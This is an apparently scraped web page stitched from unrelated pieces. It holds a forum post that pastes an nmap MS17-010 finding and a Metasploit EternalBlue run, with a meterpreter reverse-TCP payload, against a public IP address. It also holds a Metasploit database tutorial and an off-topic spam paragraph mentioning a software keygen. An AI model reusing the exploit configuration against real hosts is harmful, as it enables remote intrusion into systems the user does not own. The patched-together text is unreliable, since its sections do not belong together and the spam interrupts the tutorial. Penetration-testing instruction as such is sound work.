445 Tcp Open Microsoft Ds Metasploit

Posted on by

MICROSOFT-DS.What is this? This is explained in Microsoft Knowledge Base article Q131641, and can be seen by using a port scanner to probe TCP port 139 (the 'nbsession' port) on an adapter. Using the Metasploit Database. Johan Grotherus. August 28, 2015 Views: 10726. Begin Learning Cyber Security for FREE Now! 192.168.1.3 445 tcp microsoft-ds open 192.168.1.3 548 tcp afp open 192.168.1.3 5009 tcp airport-admin open 192.168.1.3 139 tcp netbios-ssn open.

@busterb hi again here are the information

iam using nmap to check vulnerability and information about of target

Host is up (0.29s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds

Host script results:
smb-os-discovery:
OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
Computer name: SECURITYV01
NetBIOS computer name: SECURITYV01x00
Workgroup: WORKGROUPx00
_ System time: 2017-06-15T20:35:03-05:00
smb-vuln-ms17-10:
VULNERABLE:
Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
State: VULNERABLE
IDs: CVE:CVE-2017-0143
Risk factor: HIGH
A critical remote code execution vulnerability exists in Microsoft SMBv1
servers (ms17-010).

Disclosure date: 2017-03-14
References:
https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
msf exploit(ms17_010_eternalblue) > exploit

[] Started reverse TCP handler on 192.168.0.106:4444
[] 190.11.20.72:445 - Connecting to target for exploitation.
[-] 190.11.20.72:445 - RubySMB::Error::UnexpectedStatusCode: Error with login: (0xc000006d) STATUS_LOGON_FAILURE: The attempted logon is invalid. This is either due to a bad username or authentication information.
[*] Exploit completed, but no session was created.
msf exploit(ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

Name Current Setting Required Description

GroomAllocations 12 yes Initial number of times to groom the kernel pool.
GroomDelta 5 yes The amount to increase the groom count by per try.
MaxExploitAttempts 3 yes The number of times to retry the exploit.
ProcessName explorer.exe yes Process to inject payload into.
RHOST 190.11.xx.xx yes The target address
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VerifyArch true yes Check if remote architecture matches exploit Target.
VerifyTarget true yes Check if remote OS matches exploit Target.

Payload options (windows/x64/meterpreter/reverse_tcp):

Name Current Setting Required Description

EXITFUNC thread yes Exit technique (Accepted: ', seh, thread, process, none)
LHOST 192.168.0.106 yes The listen address
LPORT 4444 yes The listen port

Exploit target:

Id Name

0 Windows 7 and Server 2008 R2 (x64) All Service Packs

thanks.

The Metasploit database is a good way of keeping track of the things you get your hands on during a penetration test. The database can hold things like hosts, services, usernames and passwords. One particular useful feature of the Metasploit database is the integration it has with Nmap. You can utilize Nmap scans from within Metasploit and store the results directly in the database.

Let’s see how this works.

Step 1 is to make sure that PostgreSQL is running on your Kali Linux machine.

> service postgresql start

Step 2 is to verify that Metasploit has a connection to the database.

> msfconsole (to start the Metasploit console)
msf> db_status (to check the database connection)
It should come back as [*] postgresql connected to msf3

If the database is not connected, you need to initialize it first.

msf> exit
> msfdb init (this is for Kali Linux 2.0)

Then try step 2 again, it should be good now.

The first thing to do is to create a new workspace. A workspace is simply just a table in the database to store data in, but it helps you stay organized. You might try to see workspaces as projects or clients. When you have a new client or project, create a new workspace.

The workspace command is what you use to to manage workspaces. You can have several workspaces and easily switch between them.

msf> workspace

This gives you the workspace you’re currently using. You can easily create a new workspace using the -a flag and delete one with the -d flag. Switching between workspaces is simply done by entering workspace .

msf> workspace -a test (create a workspace named test)
msf> workspace -d test (delete workspace named test)
msf> workspace test (switch to the workspace test)
msf> workspace -r test test2 (rename workspace test to test2)

Now, it’s time to get some Nmap data into your database. You can do this in two ways: either by importing a Nmap scan or by issuing a Nmap scan from within the Metasploit console. To import data, you use the db_import command. The Nmap scan result file that you import must be in XML format.

Also, that video you can upload it to Facebook and YouTube. Final Cut latest version use FCPX to be refreshing to use. When the editing is done and you can save a video to the specific device. Playback pro plus keygen for mac It provides many effects such as PIP, Jump Cut, and Mosaic etc.

msf> db_import /root/nmap_scan.xml (to import a previous Nmap scan result file)

Microsoft

msf > db_import /root/nmap_router_scan
[*] Importing ‘Nmap XML’ data
[*] Import: Parsing with ‘Nokogiri v1.6.6.2’
[*] Importing host 192.168.1.1
[*] Successfully imported /root/nmap_router_scan
msf >

Now that we’ve imported data, let’s see what we got. First, we use the hosts command to list all the hosts we have in our database workspace.

msf > hosts

Hosts

address mac name os_name os_flavor os_sp purpose info comments
——- — —- ——- ——— —– ——- —- ——–
192.168.1.1 08:63:61:8e:8f:4e homerouter.cpe Unknown device

msf >

Second, we check which services we got listed from our imported Nmap scan:

msf > services

Services

host port proto name state info
—- —- —– —- —– —-
192.168.1.1 22 tcp ssh open
192.168.1.1 23 tcp telnet filtered
192.168.1.1 53 tcp domain open
192.168.1.1 80 tcp http open
192.168.1.1 443 tcp https open
192.168.1.1 631 tcp ipp filtered
192.168.1.1 3000 tcp ppp open
192.168.1.1 8081 tcp blackice-icecap filtered

msf >

445 Tcp Open Microsoft Ds Metasploit

You can import a lot of different data into the Metasploit database simply by using the db_import command to get a complete list of available file imports.

msf > db_import
Usage: db_import [file2…]

Filenames can be globs like *.xml, or **/*.xml, which will search recursively.

Currently supported file types include:

Acunetix
Amap Log
Amap Log -m
Appscan
Burp Session XML
CI
Foundstone
FusionVM XML
IP Address List
IP360 ASPL
IP360 XML v3
Libpcap Packet Capture
Metasploit PWDump Export
Metasploit XML
Metasploit Zip Export
Microsoft Baseline Security Analyzer
NeXpose Simple XML
NeXpose XML Report
Nessus NBE Report
Nessus XML (v1)
Nessus XML (v2)
NetSparker XML
Nikto XML
Nmap XML
OpenVAS Report
OpenVAS XML
Outpost24 XML
Qualys Asset XML
Qualys Scan XML
Retina XML
Spiceworks CSV Export
Wapiti XML

msf >

As you can see, there are a lot of options for importing data into Metasploit. Then, there’s the other possibility: executing a Nmap scan from within the Metasploit console. You use the db_nmap command to do this. Here’s an example from my home network:

msf > db_nmap 192.168.1.3
[*] Nmap: Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-08-27 20:33 CEST
[*] Nmap: Nmap scan report for 192.168.1.3
[*] Nmap: Host is up (0.0014s latency).
[*] Nmap: Not shown: 995 closed ports
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 139/tcp open netbios-ssn
[*] Nmap: 445/tcp open microsoft-ds
[*] Nmap: 548/tcp open afp
[*] Nmap: 5009/tcp open airport-admin
[*] Nmap: 10000/tcp open snet-sensor-mgmt
[*] Nmap: MAC Address: 90:72:40:04:88:4B (Apple)
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 91.73 seconds
msf >

Now, lets check the hosts and services commands again:

msf > hosts

Hosts

address mac name os_name os_flavor os_sp purpose info comments
——- — —- ——- ——— —– ——- —- ——–
192.168.1.1 08:63:61:8e:8f:4e homerouter.cpe Unknown device
192.168.1.3 90:72:40:04:88:4b Unknown device

msf >

msf > services

Services

host port proto name state info
—- —- —– —- —– —-
192.168.1.1 22 tcp ssh open
192.168.1.1 23 tcp telnet filtered
192.168.1.1 53 tcp domain open
192.168.1.1 80 tcp http open
192.168.1.1 8081 tcp blackice-icecap filtered
192.168.1.1 443 tcp https open
192.168.1.1 3000 tcp ppp open
192.168.1.1 631 tcp ipp filtered
192.168.1.3 445 tcp microsoft-ds open
192.168.1.3 548 tcp afp open
192.168.1.3 5009 tcp airport-admin open
192.168.1.3 139 tcp netbios-ssn open
192.168.1.3 10000 tcp snet-sensor-mgmt open

msf >

As you scan additional hosts or networks, your database will hold more and more information about your target. So, as a last step in this tutorial, I’ll mention the db_export command, which allows you to make a backup. The db_export command allows for saving your workspace as an XML file or as a pwdump file. The pwdump format is for credentials only; XML format saves everything.

Tcp Port 445 Microsoft Ds

msf > db_export -f xml /root/test_workspace.xml
[*] Starting export of workspace test to /root/test_workspace.xml [ xml ]…
[*] >> Starting export of report
[*] >> Starting export of hosts
[*] >> Starting export of events
[*] >> Starting export of services
[*] >> Starting export of web sites
[*] >> Starting export of web pages
[*] >> Starting export of web forms
[*] >> Starting export of web vulns
[*] >> Starting export of module details
[*] >> Finished export of report
[*] Finished export of workspace test to /root/test_workspace.xml [ xml ]…
msf >

Open Microsoft Download

In my next tutorial I will show more features of the Metasploit database and how you can use them to your advantage.